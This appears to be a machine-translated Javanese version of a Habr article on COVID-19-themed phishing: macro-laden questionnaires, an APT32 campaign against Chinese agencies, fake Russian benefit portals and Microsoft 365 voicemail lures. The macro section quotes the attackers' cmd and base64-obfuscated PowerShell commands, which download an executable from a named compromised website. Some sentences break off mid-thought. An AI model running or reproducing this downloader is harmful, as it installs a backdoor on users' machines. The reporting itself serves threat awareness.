Penyerang terus ngeksploitasi topik COVID-19, nggawe ancaman liyane kanggo pangguna sing kepengin banget karo kabeh sing ana gandhengane karo wabah kasebut. ING
Eling ing
Apa sampeyan pengin tes gratis kanggo COVID-19?
Conto penting liyane babagan phishing bertema coronavirus yaiku
Ngyakinake umume pangguna kanggo ngaktifake makro uga gampang. Kanggo nindakake iki, trik standar digunakake: kanggo ngisi kuesioner, sampeyan kudu ngaktifake makro, tegese sampeyan kudu mbukak skrip VBA.
Nalika sampeyan bisa ndeleng, script VBA khusus masked saka antivirus.
Windows nduweni fitur ngenteni ing ngendi aplikasi ngenteni / T <detik> sadurunge nampa jawaban "Ya" standar. Ing kasus kita, skrip ngenteni 65 detik sadurunge mbusak file sementara:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Lan nalika ngenteni, malware diundhuh. Skrip PowerShell khusus diluncurake kanggo iki:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Sawise dekoding nilai Base64, skrip PowerShell ndownload backdoor sing ana ing server web sing sadurunge disusupi saka Jerman:
http://automatischer-staubsauger.com/feature/777777.png
lan disimpen kanthi jeneng:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ
dibusak nalika mbukak file 'tmps1.bat' sing ngemot printah cmd /c mkdir ""C:UsersPublictmpdir"".
Serangan sing ditargetake marang lembaga pemerintah
Kajaba iku, analis FireEye bubar nglaporake serangan APT32 sing ditargetake kanggo struktur pemerintah ing Wuhan, uga Menteri Manajemen Darurat China. Salah sawijining RTF sing disebarake ngemot link menyang artikel New York Times kanthi irah-irahan
Apike, nalika deteksi, ora ana antivirus sing ndeteksi kedadeyan kasebut, miturut Virustotal.
Nalika situs web resmi mudhun
Conto serangan phishing sing paling nggumunake kedadeyan ing Rusia sawetara dina. Alesan kanggo iki yaiku janjian keuntungan sing ditunggu-tunggu kanggo bocah umur 3 nganti 16 taun. Nalika wiwitan nrima aplikasi diumumake tanggal 12 Mei 2020, mayuta-yuta wong cepet-cepet menyang situs web Layanan Negara kanggo bantuan sing wis suwe ditunggu-tunggu lan nggawa portal kasebut ora luwih ala tinimbang serangan DDoS profesional. Nalika presiden ujar manawa "Layanan Pemerintah ora bisa ngatasi aliran aplikasi," wong-wong wiwit ngomong online babagan peluncuran situs alternatif kanggo nrima aplikasi.
Masalahe yaiku sawetara situs wiwit bisa digunakake bebarengan, lan nalika siji, sing nyata ing posobie16.gosuslugi.ru, bener nampa aplikasi, luwih
Kolega saka SearchInform nemokake babagan 30 domain penipuan anyar ing zona .ru. Perusahaan Infosecurity lan Softline wis nglacak luwih saka 70 situs web layanan pemerintah palsu sing padha wiwit awal April. Pencipta dheweke ngapusi simbol sing akrab lan uga nggunakake kombinasi tembung gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, lan liya-liyane.
Hype lan rekayasa sosial
Kabeh conto kasebut mung ngonfirmasi manawa panyerang kasil monetisasi topik koronavirus. Lan luwih dhuwur ketegangan sosial lan masalah sing ora jelas, luwih akeh kemungkinan scammers nyolong data penting, meksa wong nyerah dhuwit dhewe, utawa mung hack komputer liyane.
Lan amarga pandhemen kasebut meksa wong sing ora siyap kerja ing omah kanthi massal, ora mung pribadi, nanging uga data perusahaan ana risiko. Contone, bubar pangguna Microsoft 365 (biyen Office 365) uga kena serangan phishing. Wong nampa pesen swara "ora kejawab" minangka lampiran kanggo surat. Nanging, file kasebut sejatine minangka kaca HTML sing ngirim korban serangan kasebut
Source: www.habr.com